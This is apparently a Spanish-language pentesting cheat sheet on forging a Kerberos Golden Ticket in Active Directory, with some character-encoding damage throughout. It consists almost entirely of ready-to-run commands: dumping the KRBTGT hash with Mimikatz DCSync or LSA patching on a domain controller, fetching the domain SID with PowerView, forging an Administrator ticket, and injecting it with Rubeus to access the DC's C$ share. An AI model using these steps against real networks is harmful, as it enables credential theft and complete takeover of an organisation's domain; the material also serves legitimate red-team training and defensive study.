Descripci贸n
Un Golden Ticket es un Ticket Granting Ticket (TGT) falsificado, firmado por la cuenta KRBTGT del dominio.
Windows
Mimikatz
1) Obtenci贸n de hash NT de usuario KRBTGT con Mimikatz.
Copiar . \ mimikatz.exe
lsadump::dcsync /user: < ACME.LOCA L > \k rbtgt
2) Obtenci贸n de SID del dominio (actual).
Copiar # PowerView
Get-DomainSID
3) Creaci贸n de Golden Ticket con Mimikatz.
Copiar . \ mimikatz.exe
kerberos::golden /user:Administrator /domain: < ACME.LOCA L > /sid: < SID-domai n > /krbtgt: < NT-hash-user-KRBTG T > /ticket:golden-ticket.kirbi
4) Importar Golden Ticket en sesi贸n con Rubeus.
Copiar . \ Rubeus.exe createnetonly /program:cmd.exe /show
. \ Rubeus.exe ptt /ticket:golden-ticket.kirbi
dir \\ < DC01.ACME.LOCA L > \C$
Invoke-Mimikatz
1) Obtenci贸n de hash NT de usuario KRBTGT y SID del dominio con Invoke-Mimikatz.
Copiar $session = New-PSSession - ComputerName < computer - name - DC >
Invoke-Command - FilePath C:\ < path > \Invoke-Mimikatz.ps1 - Session $session
Enter-PSSession - Session $session
Invoke-Mimikatz - Command '"lsadump::lsa /patch"'
2) Creaci贸n de Golden Ticket con Invoke-Mimikatz.
Copiar # Inyecta el ticket en el proceso actual de PowerShell
Invoke-Mimikatz - Command '"kerberos::golden /user:Administrator /domain:<ACME.LOCAL> /sid:<SID-domain> /krbtgt:<NT-hash-user-KRBTGT> /ptt"'
# Realiza el guardado del Golden Ticket
Invoke-Mimikatz - Command '"kerberos::golden /user:Administrator /domain:<ACME.LOCAL> /sid:<SID-domain> /krbtgt:<NT-hash-user-KRBTGT> /ticket:golden-ticket.kirbi"'
3) Importar Golden Ticket en sesi贸n con Rubeus.
Copiar . \ Rubeus.exe createnetonly /program:cmd.exe /show
. \ Rubeus.exe ptt /ticket:golden-ticket.kirbi
dir \\ < DC01.ACME.LOCA L > \C$
脷ltima actualizaci贸n hace 2 a帽os